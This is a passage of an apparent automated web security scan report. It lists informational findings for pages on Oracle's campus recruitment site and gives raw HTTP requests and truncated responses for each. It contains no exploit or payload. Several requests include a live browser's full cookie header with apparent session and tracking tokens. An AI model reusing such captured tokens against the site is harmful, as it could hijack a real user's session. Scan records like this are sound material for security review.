Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:31 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 38674
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.10. https://campus.oracle.com/campus/HR/global_aboutus.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/global_aboutus.html

Request

GET /campus/HR/global_aboutus.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:57 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 12545
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.11. https://campus.oracle.com/campus/HR/global_current-openings.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/global_current-openings.html

Request

GET /campus/HR/global_current-openings.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:28:00 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 14176
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.12. https://campus.oracle.com/campus/HR/global_history.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/global_history.html

Request

GET /campus/HR/global_history.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:54 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 14344
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.13. https://campus.oracle.com/campus/HR/global_home.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/global_home.html

Request

GET /campus/HR/global_home.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/global_main.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_cc=true; gpw_e24=no%20value; s_sq=oraclegsi%3D%2526pid%253Dora%25253A%252Foracle%252Fapps%252Firc%252FcandidateSelfService%252Fwebui%252FVisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:25:32 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 14816
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.14. https://campus.oracle.com/campus/HR/global_internship.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/global_internship.html

Request

GET /campus/HR/global_internship.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/global_main.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=no%20value; gpw_e24=no%20value; s_sq=oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON; _csoot=1318854354624

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:25:40 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 14196
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.15. https://campus.oracle.com/campus/HR/global_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/global_main.html

Request

GET /campus/HR/global_main.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://campus.oracle.com/campus/HR/global_main.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; gpv_p24=https%3A//irecruitment.oracle.com/OA_HTML/OA.jsp%3FOAFunc%3DIRC_VIS_ADV_JOB_SEARCH_PAGE%26_ti%3D209088196%26oapc%3D2%26oas%3Dc63Ec25IXJtclVMeE1fbdA..; s_cc=true; gpw_e24=no%20value; s_sq=oraclegsi%3D%2526pid%253Dora%25253A%252Foracle%252Fapps%252Firc%252FcandidateSelfService%252Fwebui%252FVisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:25:30 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 40452
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.16. https://campus.oracle.com/campus/HR/global_main_about.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/global_main_about.html

Request

GET /campus/HR/global_main_about.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/zealand_main.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:36:04 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 39017
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.17. https://campus.oracle.com/campus/HR/global_scope.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/global_scope.html

Request

GET /campus/HR/global_scope.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:57 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 12582
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.18. https://campus.oracle.com/campus/HR/global_vision.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/global_vision.html

Request

GET /campus/HR/global_vision.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: */*
Referer: https://campus.oracle.com/campus/HR/global_vision.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; _csoot=1318854354624; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dfunctiononclick%252528event%252529%25257Bvision%252528%252529%25257D%2526oidt%253D2%2526ot%253DDIV%26oraclegsi%3D%2526pid%253Dora%25253A/oracle/apps/irc/candidateSelfService/webui/VisAdJobSchPG%2526pidt%253D1%2526oid%253Dfunctiononclick%252528event%252529%25257BsubmitForm%252528%252527DefaultFormName%252527%25252C1%25252C%25257B%252527evtSrcRowIdx%252527%25253A%252527%252527%25252C%252527evtSrcRowId%252527%25253A%252527%252527%25252C%252527IrcAction%2526oidt%253D2%2526ot%253DBUTTON

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:00 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 20693
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.19. https://campus.oracle.com/campus/HR/global_why.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/global_why.html

Request

GET /campus/HR/global_why.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:55 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 15076
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.20. https://campus.oracle.com/campus/HR/hk_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/hk_main.html

Request

GET /campus/HR/hk_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:39 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 30089
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.21. https://campus.oracle.com/campus/HR/india_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/india_main.html

Request

GET /campus/HR/india_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:39 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 29875
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.22. https://campus.oracle.com/campus/HR/indo_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/indo_main.html

Request

GET /campus/HR/indo_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:39 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 27331
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.23. https://campus.oracle.com/campus/HR/instructions.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/instructions.html

Request

GET /campus/HR/instructions.html HTTP/1.1
Host: campus.oracle.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://campus.oracle.com/campus/HR/zealand-apply.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_wgw_lv=1315343380912; s_nr6=1315343380933-New; s_nr=1318816660522; p_cur_URL=http://education.oracle.com/pls/web_prod-plq-dad/db_pages.getpage?page_id=233; p_org_id=1001; p_lang=US; ORA_MOS_LOCALE=en; s_pers=%20gpv_p24%3Dno%2520value%7C1318855651396%3B%20gpw_e24%3Dno%2520value%7C1318855651398%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Doraclecom%253D%252526pid%25253Docom%2525253Aen-us%2525253A%2525252Fproducts%2525252Fapplications%2525252Febusiness%2525252F%252526pidt%25253D1%252526oid%25253Dfunctiononclick%252528event%252529%2525257Bjavascript%2525253Aif%252528%252521isUserInput%252529%2525257Bdocument.searchForm.q.value%2525253D%252527%252527%2525253B%2525257D%2525257D%252526oidt%25253D2%252526ot%25253DTEXT%3B; GSI=X4SB2mPbVFu8Tai4MLrUwDwr9C; s_cc=true; gpv_p24=https%3A//campus.oracle.com/campus/HR/global_main.html; gpw_e24=https%3A//campus.oracle.com/campus/HR/global_main.html; s_sq=oraclecampus%3D%2526pid%253Dhttps%25253A//campus.oracle.com/campus/HR/global_main.html%2526oid%253Dhttps%25253A//campus.oracle.com/campus/HR/zealand_main.html%2526ot%253DA; _csoot=1318854620551

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:30:16 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 7352
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.24. https://campus.oracle.com/campus/HR/japan_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/japan_main.html

Request

GET /campus/HR/japan_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:41 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 44973
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.25. https://campus.oracle.com/campus/HR/korea_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/korea_main.html

Request

GET /campus/HR/korea_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:45 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 27317
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.26. https://campus.oracle.com/campus/HR/lad-internship.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/lad-internship.html

Request

GET /campus/HR/lad-internship.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:28:01 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 3734
Connection: close
Content-Type: text/html
X-Pad: avoid browser bug

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.27. https://campus.oracle.com/campus/HR/lad_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/lad_main.html

Request

GET /campus/HR/lad_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:34 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 26841
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.28. https://campus.oracle.com/campus/HR/malay_main.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://campus.oracle.com
Path:   /campus/HR/malay_main.html

Request

GET /campus/HR/malay_main.html HTTP/1.1
Host: campus.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 17 Oct 2011 12:27:47 GMT
Server: Oracle-Application-Server-10g/10.1.3.0.0 Oracle-HTTP-Server
Last-Modified: Fri, 07 Oct 2011 13:28:00 GMT
Accept-Ranges: bytes
Content-Length: 27329
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...

15.29. https://campus.oracle.com/campus/HR/news.html  previous  next

Summary

Severity:   Information
